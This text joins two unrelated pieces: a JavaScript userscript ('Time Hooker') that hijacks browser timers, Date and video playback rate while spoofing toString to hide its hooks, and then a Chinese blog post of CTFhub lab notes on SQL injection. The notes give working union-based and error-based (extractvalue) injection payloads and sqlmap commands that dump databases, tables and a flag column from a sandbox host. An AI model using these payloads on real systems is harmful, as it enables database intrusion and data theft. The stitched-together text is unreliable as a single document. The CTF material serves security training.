/**
 * 1. hook Object.defineProperty | Object.defineProperties
 * 2. set configurable: true
 * 3. delete property
 * 4. can set property for onxx event method
 */

window.isDOMLoaded = false;
window.isDOMRendered = false;

document.addEventListener('readystatechange', function () {
    if (document.readyState === "interactive" || document.readyState === "complete") {
        window.isDOMLoaded = true;
    }
});

~function (global) {

    var workerURLs = [];
    var extraElements = [];
    var suppressEvents = {};

    var helper = function (eHookContext, timerContext, util) {
        return {
            applyUI: function () {
                var style = '._th-container ._th-item{margin-bottom:3px;position:relative;width:0;height:0;cursor:pointer;opacity:.3;background-color:aquamarine;border-radius:100%;text-align:center;line-height:30px;-webkit-transition:all .35s;-o-transition:all .35s;transition:all .35s;right:30px}._th-container ._th-item,._th-container ._th-click-hover,._th_cover-all-show-times ._th_times{-webkit-box-shadow:-3px 4px 12px -5px black;box-shadow:-3px 4px 12px -5px black}._th-container:hover ._th-item._item-x2{margin-left:18px;width:40px;height:40px;line-height:40px}._th-container:hover ._th-item._item-x-2{margin-left:17px;width:38px;height:38px;line-height:38px}._th-container:hover ._th-item._item-xx2{width:36px;height:36px;margin-left:16px;line-height:36px}._th-container:hover ._th-item._item-xx-2{width:32px;height:32px;line-height:32px;margin-left:14px}._th-container:hover ._th-item._item-reset{width:30px;line-height:30px;height:30px;margin-left:10px}._th-click-hover{position:relative;-webkit-transition:all .5s;-o-transition:all .5s;transition:all .5s;height:45px;width:45px;cursor:pointer;opacity:.3;border-radius:100%;background-color:aquamarine;text-align:center;line-height:45px;right:0}._th-container:hover{left:-5px}._th-container{font-size:12px;-webkit-transition:all .5s;-o-transition:all .5s;transition:all .5s;left:-35px;top:20%;position:fixed;-webkit-box-sizing:border-box;box-sizing:border-box;z-index:100000;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}._th-container ._th-item:hover{opacity:.8;background-color:#5fb492;color:aliceblue}._th-container ._th-item:active{opacity:.9;background-color:#1b3a26;color:aliceblue}._th-container:hover ._th-click-hover{opacity:.8}._th-container:hover ._th-item{opacity:.6;right:0}._th-container ._th-click-hover:hover{opacity:.8;background-color:#5fb492;color:aliceblue}._th_cover-all-show-times{position:fixed;top:0;right:0;width:100%;height:100%;z-index:99999;opacity:1;font-weight:900;font-size:30px;color:#4f4f4f;background-color:rgba(0,0,0,0.1)}._th_cover-all-show-times._th_hidden{z-index:-99999;opacity:0;-webkit-transition:1s all;-o-transition:1s all;transition:1s all}._th_cover-all-show-times ._th_times{width:300px;height:300px;border-radius:50%;background-color:rgba(127,255,212,0.51);text-align:center;line-height:300px;position:absolute;top:50%;right:50%;margin-top:-150px;margin-right:-150px}';

                var displayNum = (1 / timerContext._percentage).toFixed(2);

                // 在页面左边添加一个半圆便于修改
                var html = '\n' +
                    '    \n' +
                    '        x' + displayNum + '\n' +
                    '    
\n' +
                    '    >
\n' +
                    '    <
\n' +
                    '    >>
\n' +
                    '    <<
\n' +
                    '    O
\n' +
                    '
\n' +
                    '\n' +
                    '    x' + displayNum + '
\n' +
                    '
' +
                    '';
                var stylenode = document.createElement('style');
                stylenode.setAttribute("type", "text/css");
                if (stylenode.styleSheet) {// IE
                    stylenode.styleSheet.cssText = style;
                } else {// w3c
                    var cssText = document.createTextNode(style);
                    stylenode.appendChild(cssText);
                }
                var node = document.createElement('div');
                node.innerHTML = html;

                var clickMapper = {
                    '_item-input': function () {
                        changeTime();
                    },
                    '_item-x2': function () {
                        changeTime(2, 0, true);
                    },
                    '_item-x-2': function () {
                        changeTime(-2, 0, true);
                    },
                    '_item-xx2': function () {
                        changeTime(0, 2);
                    },
                    '_item-xx-2': function () {
                        changeTime(0, -2);
                    },
                    '_item-reset': function () {
                        changeTime(0, 0, false, true);
                    }
                };

                Object.keys(clickMapper).forEach(function (className) {
                    var exec = clickMapper[className];
                    var targetEle = node.getElementsByClassName(className)[0];
                    if (targetEle) {
                        targetEle.onclick = exec;
                    }
                });

                if (!global.isDOMLoaded) {
                    document.addEventListener('readystatechange', function () {
                        if ((document.readyState === "interactive" || document.readyState === "complete") && !global.isDOMRendered) {
                            document.head.appendChild(stylenode);
                            document.body.appendChild(node);
                            global.isDOMRendered = true;
                            console.log('Time Hooker Works!');
                        }
                    });
                } else {
                    document.head.appendChild(stylenode);
                    document.body.appendChild(node);
                    global.isDOMRendered = true;
                    console.log('Time Hooker Works!');
                }
            },
            applyGlobalAction: function (timer) {
                // 界面半圆按钮点击的方法
                timer.changeTime = function (anum, cnum, isa, isr) {
                    if (isr) {
                        global.timer.change(1);
                        return;
                    }
                    if (!global.timer) {
                        return;
                    }
                    var result;
                    if (!anum && !cnum) {
                        var t = prompt("输入欲改变计时器变化倍率（当前：" + 1 / timerContext._percentage + "）");
                        if (t == null) {
                            return;
                        }
                        if (isNaN(parseFloat(t))) {
                            alert("请输入正确的数字");
                            timer.changeTime();
                            return;
                        }
                        if (parseFloat(t) <= 0) {
                            alert("倍率不能小于等于0");
                            timer.changeTime();
                            return;
                        }
                        result = 1 / parseFloat(t);
                    } else {
                        if (isa && anum) {
                            if (1 / timerContext._percentage <= 1 && anum < 0) {
                                return;
                            }
                            result = 1 / (1 / timerContext._percentage + anum);
                        } else {
                            if (cnum <= 0) {
                                cnum = 1 / -cnum
                            }
                            result = 1 / ((1 / timerContext._percentage) * cnum);
                        }
                    }
                    timer.change(result);
                };
                global.changeTime = timer.changeTime;
            },
            applyHooking: function () {
                var _this = this;
                // 劫持循环计时器
                eHookContext.hookReplace(window, 'setInterval', function (setInterval) {
                    return _this.getHookedTimerFunction('interval', setInterval);
                });
                // 劫持单次计时
                eHookContext.hookReplace(window, 'setTimeout', function (setTimeout) {
                    return _this.getHookedTimerFunction('timeout', setTimeout)
                });
                // 劫持循环计时器的清除方法
                eHookContext.hookBefore(window, 'clearInterval', function (method, args) {
                    _this.redirectNewestId(args);
                });
                // 劫持循环计时器的清除方法
                eHookContext.hookBefore(window, 'clearTimeout', function (method, args) {
                    _this.redirectNewestId(args);
                });
                var newFunc = this.getHookedDateConstructor();
                eHookContext.hookClass(window, 'Date', newFunc, '_innerDate', ['now']);
                Date.now = function () {
                    return new Date().getTime();
                };
                eHookContext.hookedToString(timerContext._Date.now, Date.now);
                var objToString = Object.prototype.toString;

                Object.prototype.toString = function toString() {
                    'use strict';
                    if (this instanceof timerContext._mDate) {
                        return '[object Date]';
                    } else {
                        return objToString.call(this);
                    }
                };

                eHookContext.hookedToString(objToString, Object.prototype.toString);
                eHookContext.hookedToString(timerContext._setInterval, setInterval);
                eHookContext.hookedToString(timerContext._setTimeout, setTimeout);
                eHookContext.hookedToString(timerContext._clearInterval, clearInterval);
                timerContext._mDate = window.Date;
                this.hookShadowRoot();
            },
            getHookedDateConstructor: function () {
                return function () {
                    if (arguments.length === 1) {
                        Object.defineProperty(this, '_innerDate', {
                            configurable: false,
                            enumerable: false,
                            value: new timerContext._Date(arguments[0]),
                            writable: false
                        });
                        return;
                    } else if (arguments.length > 1) {
                        var definedValue;
                        switch (arguments.length) {
                            case 2:
                                definedValue = new timerContext._Date(
                                    arguments[0],
                                    arguments[1]
                                );
                                break;
                            case 3:
                                definedValue = new timerContext._Date(
                                    arguments[0],
                                    arguments[1],
                                    arguments[2],
                                );
                                break;
                            case 4:
                                definedValue = new timerContext._Date(
                                    arguments[0],
                                    arguments[1],
                                    arguments[2],
                                    arguments[3],
                                );
                                break;
                            case 5:
                                definedValue = new timerContext._Date(
                                    arguments[0],
                                    arguments[1],
                                    arguments[2],
                                    arguments[3],
                                    arguments[4]
                                );
                                break;
                            case 6:
                                definedValue = new timerContext._Date(
                                    arguments[0],
                                    arguments[1],
                                    arguments[2],
                                    arguments[3],
                                    arguments[4],
                                    arguments[5]
                                );
                                break;
                            default:
                            case 7:
                                definedValue = new timerContext._Date(
                                    arguments[0],
                                    arguments[1],
                                    arguments[2],
                                    arguments[3],
                                    arguments[4],
                                    arguments[5],
                                    arguments[6]
                                );
                                break;
                        }

                        Object.defineProperty(this, '_innerDate', {
                            configurable: false,
                            enumerable: false,
                            value: definedValue,
                            writable: false
                        });
                        return;
                    }
                    var now = timerContext._Date.now();
                    var passTime = now - timerContext.__lastDatetime;
                    var hookPassTime = passTime * (1 / timerContext._percentage);
                    // console.log(__this.__lastDatetime + hookPassTime, now,__this.__lastDatetime + hookPassTime - now);
                    Object.defineProperty(this, '_innerDate', {
                        configurable: false,
                        enumerable: false,
                        value: new timerContext._Date(timerContext.__lastMDatetime + hookPassTime),
                        writable: false
                    });
                };
            },
            getHookedTimerFunction: function (type, timer) {
                var property = '_' + type + 'Ids';
                return function () {
                    var uniqueId = timerContext.genUniqueId();
                    var callback = arguments[0];
                    if (typeof callback === 'string') {
                        callback += ';timer.notifyExec(' + uniqueId + ')';
                        arguments[0] = callback;
                    }
                    if (typeof callback === 'function') {
                        arguments[0] = function () {
                            var returnValue = callback.apply(this, arguments);
                            timerContext.notifyExec(uniqueId);
                            return returnValue;
                        }
                    }
                    // 储存原始时间间隔
                    var originMS = arguments[1];
                    // 获取变速时间间隔
                    arguments[1] *= timerContext._percentage;
                    var resultId = timer.apply(window, arguments);
                    // 保存每次使用计时器得到的id以及参数等
                    timerContext[property][resultId] = {
                        args: arguments,
                        originMS: originMS,
                        originId: resultId,
                        nowId: resultId,
                        uniqueId: uniqueId,
                        oldPercentage: timerContext._percentage,
                        exceptNextFireTime: timerContext._Date.now() + originMS
                    };
                    return resultId;
                };
            },
            redirectNewestId: function (args) {
                var id = args[0];
                if (timerContext._intervalIds[id]) {
                    args[0] = timerContext._intervalIds[id].nowId;
                    // 清除该记录id
                    delete timerContext._intervalIds[id];
                }
                if (timerContext._timeoutIds[id]) {
                    args[0] = timerContext._timeoutIds[id].nowId;
                    // 清除该记录id
                    delete timerContext._timeoutIds[id];
                }
            },
            registerShortcutKeys: function (timer) {
                // 快捷键注册
                addEventListener('keydown', function (e) {
                    switch (e.keyCode) {
                        case 57:
                            if (e.ctrlKey || e.altKey) {
                                // custom
                                timer.changeTime();
                            }
                            break;
                        // [=]
                        case 190:
                        case 187: {
                            if (e.ctrlKey) {
                                // console.log('+2');
                                timer.changeTime(2, 0, true);
                            } else if (e.altKey) {
                                // console.log('xx2');
                                timer.changeTime(0, 2);
                            }
                            break;
                        }
                        // [-]
                        case 188:
                        case 189: {
                            if (e.ctrlKey) {
                                // console.log('-2');
                                timer.changeTime(-2, 0, true);
                            } else if (e.altKey) {
                                // console.log('xx-2');
                                timer.changeTime(0, -2);
                            }
                            break;
                        }
                        // [0]
                        case 48: {
                            if (e.ctrlKey || e.altKey) {
                                // console.log('reset');
                                timer.changeTime(0, 0, false, true);
                            }
                            break;
                        }
                        default:
                        // console.log(e);
                    }
                });
            },
            /**
             * 当计时器速率被改变时调用的回调方法
             * @param percentage
             * @private
             */
            percentageChangeHandler: function (percentage) {
                // 改变所有的循环计时
                util.ergodicObject(timerContext, timerContext._intervalIds, function (idObj, id) {
                    idObj.args[1] = Math.floor((idObj.originMS || 1) * percentage);
                    // 结束原来的计时器
                    this._clearInterval.call(window, idObj.nowId);
                    // 新开一个计时器
                    idObj.nowId = this._setInterval.apply(window, idObj.args);
                });
                // 改变所有的延时计时
                util.ergodicObject(timerContext, timerContext._timeoutIds, function (idObj, id) {
                    var now = this._Date.now();
                    var exceptTime = idObj.exceptNextFireTime;
                    var oldPercentage = idObj.oldPercentage;
                    var time = exceptTime - now;
                    if (time < 0) {
                        time = 0;
                    }
                    var changedTime = Math.floor(percentage / oldPercentage * time);
                    idObj.args[1] = changedTime;
                    // 重定下次执行时间
                    idObj.exceptNextFireTime = now + changedTime;
                    idObj.oldPercentage = percentage;
                    // 结束原来的计时器
                    this._clearTimeout.call(window, idObj.nowId);
                    // 新开一个计时器
                    idObj.nowId = this._setTimeout.apply(window, idObj.args);
                });
            },
            hookShadowRoot: function () {
                var origin = Element.prototype.attachShadow;
                eHookContext.hookAfter(Element.prototype, 'attachShadow',
                    function (m, args, result) {
                        extraElements.push(result);
                        return result;
                    }, false);
                eHookContext.hookedToString(origin, Element.prototype.attachShadow);
            },
            hookDefine: function () {
                const _this = this;
                eHookContext.hookBefore(Object, 'defineProperty', function (m, args) {
                    var option = args[2];
                    var ele = args[0];
                    var key = args[1];
                    var afterArgs = _this.hookDefineDetails(ele, key, option);
                    afterArgs.forEach((arg, i) => {
                        args[i] = arg;
                    })
                });
                eHookContext.hookBefore(Object, 'defineProperties', function (m, args) {
                    var option = args[1];
                    var ele = args[0];
                    if (ele && ele instanceof Element) {
                        Object.keys(option).forEach(key => {
                            var o = option[key];
                            var afterArgs = _this.hookDefineDetails(ele, key, o);
                            args[0] = afterArgs[0];
                            delete option[key];
                            option[afterArgs[1]] = afterArgs[2]
                        })
                    }
                })
            },
            hookDefineDetails: function (target, key, option) {
                if (option && target && target instanceof Element && typeof key === 'string' && key.indexOf('on') >= 0) {
                    option.configurable = true;
                }
                if (target instanceof HTMLVideoElement && key === 'playbackRate') {
                    option.configurable = true;
                    console.warn('[Timer Hook]', '已阻止默认操作视频倍率');
                    key = 'playbackRate_hooked'
                }
                return [target, key, option];
            },
            suppressEvent: function (ele, eventName) {
                if (ele) {
                    delete ele['on' + eventName];
                    delete ele['on' + eventName];
                    delete ele['on' + eventName];
                    ele['on' + eventName] = undefined;
                }
                if (!suppressEvents[eventName]) {
                    eHookContext.hookBefore(EventTarget.prototype, 'addEventListener',
                        function (m, args) {
                            var eName = args[0];
                            if (eventName === eName) {
                                console.warn(eventName, 'event suppressed.')
                                args[0] += 'suppressed';
                            }
                        }, false);
                    suppressEvents[eventName] = true;
                }
            },
            changePlaybackRate: function (ele, rate) {
                delete ele.playbackRate;
                delete ele.playbackRate;
                delete ele.playbackRate;
                ele.playbackRate = rate
                if (rate !== 1) {
                    timerContext.defineProperty.call(Object, ele, 'playbackRate', {
                        configurable: true,
                        get: function () {
                            return 1;
                        },
                        set: function () {
                        }
                    });
                }
            }
        }
    };

    var normalUtil = {
        isInIframe: function () {
            let is = global.parent !== global;
            try {
                is = is && global.parent.document.body.tagName !== 'FRAMESET'
            } catch (e) {
                // ignore
            }
            return is;
        },
        listenParentEvent: function (handler) {
            global.addEventListener('message', function (e) {
                var data = e.data;
                var type = data.type || '';
                if (type === 'changePercentage') {
                    handler(data.percentage || 0);
                }
            })
        },
        sentChangesToIframe: function (percentage) {
            var iframes = document.querySelectorAll('iframe') || [];
            var frames = document.querySelectorAll('frame');
            if (iframes.length) {
                for (var i = 0; i < iframes.length; i++) {
                    iframes[i].contentWindow.postMessage(
                        {type: 'changePercentage', percentage: percentage}, '*');
                }
            }
            if (frames.length) {
                for (var j = 0; j < frames.length; j++) {
                    frames[j].contentWindow.postMessage(
                        {type: 'changePercentage', percentage: percentage}, '*');
                }
            }
        }
    };

    var querySelectorAll = function (ele, selector, includeExtra) {
        var elements = ele.querySelectorAll(selector);
        elements = Array.prototype.slice.call(elements || []);
        if (includeExtra) {
            extraElements.forEach(function (element) {
                elements = elements.concat(querySelectorAll(element, selector, false));
            })
        }
        return elements;
    };

    var generate = function () {
        return function (util) {
            // disable worker
            workerURLs.forEach(function (url) {
                if (util.urlMatching(location.href, 'http.*://.*' + url + '.*')) {
                    window['Worker'] = undefined;
                    console.log('Worker disabled');
                }
            });
            var eHookContext = this;
            var timerHooker = {
                // 用于储存计时器的id和参数
                _intervalIds: {},
                _timeoutIds: {},
                _auoUniqueId: 1,
                // 计时器速率
                __percentage: 1.0,
                // 劫持前的原始的方法
                _setInterval: window['setInterval'],
                _clearInterval: window['clearInterval'],
                _clearTimeout: window['clearTimeout'],
                _setTimeout: window['setTimeout'],
                _Date: window['Date'],
                __lastDatetime: new Date().getTime(),
                __lastMDatetime: new Date().getTime(),
                videoSpeedInterval: 1000,
                defineProperty: Object.defineProperty,
                defineProperties: Object.defineProperties,
                genUniqueId: function () {
                    return this._auoUniqueId++;
                },
                notifyExec: function (uniqueId) {
                    var _this = this;
                    if (uniqueId) {
                        // 清除 timeout 所储存的记录
                        var timeoutInfos = Object.values(this._timeoutIds).filter(
                            function (info) {
                                return info.uniqueId === uniqueId;
                            }
                        );
                        timeoutInfos.forEach(function (info) {
                            _this._clearTimeout.call(window, info.nowId);
                            delete _this._timeoutIds[info.originId]
                        })
                    }
                    // console.log(uniqueId, 'called')
                },
                /**
                 * 初始化方法
                 */
                init: function () {
                    var timerContext = this;
                    var h = helper(eHookContext, timerContext, util);

                    h.hookDefine();
                    h.applyHooking();

                    // 设定百分比属性被修改的回调
                    Object.defineProperty(timerContext, '_percentage', {
                        get: function () {
                            return timerContext.__percentage;
                        },
                        set: function (percentage) {
                            if (percentage === timerContext.__percentage) {
                                return percentage;
                            }
                            h.percentageChangeHandler(percentage);
                            timerContext.__percentage = percentage;
                            return percentage;
                        }
                    });

                    if (!normalUtil.isInIframe()) {
                        console.log('[TimeHooker]', 'loading outer window...');
                        h.applyUI();
                        h.applyGlobalAction(timerContext);
                        h.registerShortcutKeys(timerContext);
                    } else {
                        console.log('[TimeHooker]', 'loading inner window...');
                        normalUtil.listenParentEvent((function (percentage) {
                            console.log('[TimeHooker]', 'Inner Changed', percentage)
                            this.change(percentage);
                        }).bind(this))
                    }
                },
                /**
                 * 调用该方法改变计时器速率
                 * @param percentage
                 */
                change: function (percentage) {
                    this.__lastMDatetime = this._mDate.now();
                    this.__lastDatetime = this._Date.now();
                    this._percentage = percentage;
                    var oldNode = document.getElementsByClassName('_th-click-hover');
                    var oldNode1 = document.getElementsByClassName('_th_times');
                    var displayNum = (1 / this._percentage).toFixed(2);
                    (oldNode[0] || {}).innerHTML = 'x' + displayNum;
                    (oldNode1[0] || {}).innerHTML = 'x' + displayNum;
                    var a = document.getElementsByClassName('_th_cover-all-show-times')[0] || {};
                    a.className = '_th_cover-all-show-times';
                    this._setTimeout.bind(window)(function () {
                        a.className = '_th_cover-all-show-times _th_hidden';
                    }, 100);
                    this.changeVideoSpeed();
                    normalUtil.sentChangesToIframe(percentage);
                },
                changeVideoSpeed: function () {
                    var timerContext = this;
                    var h = helper(eHookContext, timerContext, util);
                    var rate = 1 / this._percentage;
                    rate > 16 && (rate = 16);
                    rate < 0.065 && (rate = 0.065);
                    var videos = querySelectorAll(document, 'video', true) || [];
                    if (videos.length) {
                        for (var i = 0; i < videos.length; i++) {
                            h.changePlaybackRate(videos[i], rate);
                        }
                    }
                }
            };
            // 默认初始化
            timerHooker.init();
            return timerHooker;
        }
    };

    if (global.eHook) {
        global.eHook.plugins({
            name: 'timer',
            /**
             * 插件装载
             * @param util
             */
            mount: generate()
        });
    }
}(window);

SQL注入(一)

2025-05-22T12:28:00.000Z

靶场搭建

项目:Audi-1/sqli-labs: SQLI labs to test error based, Blind boolean based, Time based.

SQL配置：WWW\sql\sql-connections\db-creds.inc

php版本：5.3

数据库管理工具:phpMyAdmin4.8.5

数据库命令

增删改

#输入密码登录数据库
mysql -u root -p

#查看数据库
show databases;

#创建数据库employees并选择字符集
create database employees charset utf8;

#删除数据库employees
drop database employees;

#选择进入数据库employees
use employees;

#创建数据表employee,写入表格信息及相关参数
create table employee
(
    id int,
    name varchar(40),
    sex char(4),
    birthday date,
    job varchar(100)
);

#修改数据表名称为user
rename table employee to user;

#写入内容
INSERT INTO user (id, name, sex, birthday, job)
VALUES (1, 'haha', 'male', '2005-01-01', 'st');

#查看数据表列表
select*from user;

#增加一列内容
alter table user add salary decimal(8,2);

#修改所有工资为5000
update user set salary=5000;

#修改id=1的行的name为hehe
update user set name='hehe' where id=1;

#修改id=1的行的name为hehe1,salary为6000
udate user set name='hehe1',salary=6000 where id=1;

#删除列
alter table user drop salary;

#删除行
delete from user where id=1;

#删除表
delete from user;

查询

select * from users where id=1;
#select+列名(*代表所有)from +表名 where+条件语句
select * from users where id in ('3');
#从users表格，查询所有包含id为3

select * from users where id=(select id from users where username=('admin'));
#子查询，优先执行()内查询语句

select id from users union select email_id from emails;
#查询并合并数据显示
select * from user where id=6 union select *,3 from eamils where id=6;
#列数必须相同

select * from users where id =9 group by 2;
#group by进行分组，用来判断列数
select * from users order by 3;
#order by默认升序排列，对第三列进行排序，desc变降序
select * from users limit 0,3;
#限制为从第1行开始显示3行

题目-CTFhub

整数型注入

有回显，order by判断列数。当为3时没回显，列数为2

union select 1,database()```查询当前数据库名


![image-20250523220015040](2025.5.22-SQL注入(一)/image-20250523220015040.png)

```-1 union select 1,group_concat(schema_name)from information_schema.schemata```，查询所有数据库名

![image-20250523220313245](2025.5.22-SQL注入(一)/image-20250523220313245.png)

```-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'```查询sqli数据库的表

![image-20250523220427409](2025.5.22-SQL注入(一)/image-20250523220427409.png)

```-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'```获取falg表的列

![image-20250523221156413](2025.5.22-SQL注入(一)/image-20250523221156413.png)

```-1 union select 1,group_concat(flag) from sqli.flag```获取flag列的内容

![image-20250523221240186](2025.5.22-SQL注入(一)/image-20250523221240186.png)

## 字符型注入

![image-20250523223554365](2025.5.22-SQL注入(一)/image-20250523223554365.png)

输入1

![image-20250523223626169](2025.5.22-SQL注入(一)/image-20250523223626169.png)

```1'-- '```看一下，发现可以

![image-20250523223734632](2025.5.22-SQL注入(一)/image-20250523223734632.png)

```order by```判断列数，3时没回显，字段数为2

![image-20250523224150201](2025.5.22-SQL注入(一)/image-20250523224150201.png)

```-1' union select 1,group_concat(schema_name) from information_schema.schemata -- ‘```查询数据库名

![image-20250523224313259](2025.5.22-SQL注入(一)/image-20250523224313259.png)

上题flag是放sqli,这题先看sqli的表```-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' -- '```

![image-20250523224447291](2025.5.22-SQL注入(一)/image-20250523224447291.png)

```-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' #''```看falg中的列

![image-20250523224656180](2025.5.22-SQL注入(一)/image-20250523224656180.png)

```-1' union select 1,flag from sqli.flag -- '```获取内容

![image-20250523224730903](2025.5.22-SQL注入(一)/image-20250523224730903.png)

## 报错注入

```sql
EXTRACTVALUE(xml_frag, xpath_expr)

xml_frag 代表 XML 文档或者片段。
xpath_expr 是 XPath 表达式，其作用是指定要提取的节点。

输入1和任意内容试一下

用extractvalue()报错看一下1 and extractvalue(1,concat(0x7e,database(),0x7e))，获取数据库名

暴表名1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))

暴列名1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag'),0x7e))

暴内容1 and extractvalue(1,concat(0x7e,(select flag from flag),0x7e))

好像缺点，用select ，1 and extractvalue(1,(select flag from flag))

布尔盲注

1	substr(str,from,length)

str：表示要进行截取操作的原始字符串。
from
：指定开始截取的位置，该位置是从 1 开始计数的。
- 若 from 为正数，则从字符串的左侧开始计数。
- 若 from 为负数，则从字符串的右侧开始计数。
- 若 from 为 0，则会被视为 1。
length（可选）：用于指定要截取的字符长度。如果省略该参数，则会截取从 from 位置到字符串末尾的所有字符。

这题用的sqlmap做的

先跑数据库

python sqlmap.py -u "http://challenge-9eb3f855ce03de28.sandbox.ctfhub.com:10800/?id=1" --dbs

再跑sqli库中的表

python sqlmap.py -u http://challenge-9eb3f855ce03de28.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

最后是获取内容

先看列，发现只有一个fk的字段，但是提取它的内容是空的（实际数据是放在flag字段，不知道为啥不显示）

python sqlmap.py -u "http://challenge-9eb3f855ce03de28.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --columns

导出flag列的内容（布尔是真慢呀，一个字母就要跑老久ε=(´ο｀*)))）

python sqlmap.py -u "http://challenge-9eb3f855ce03de28.sandbox.ctfhub.com:10800/?id=1" -T flag -C flag --dump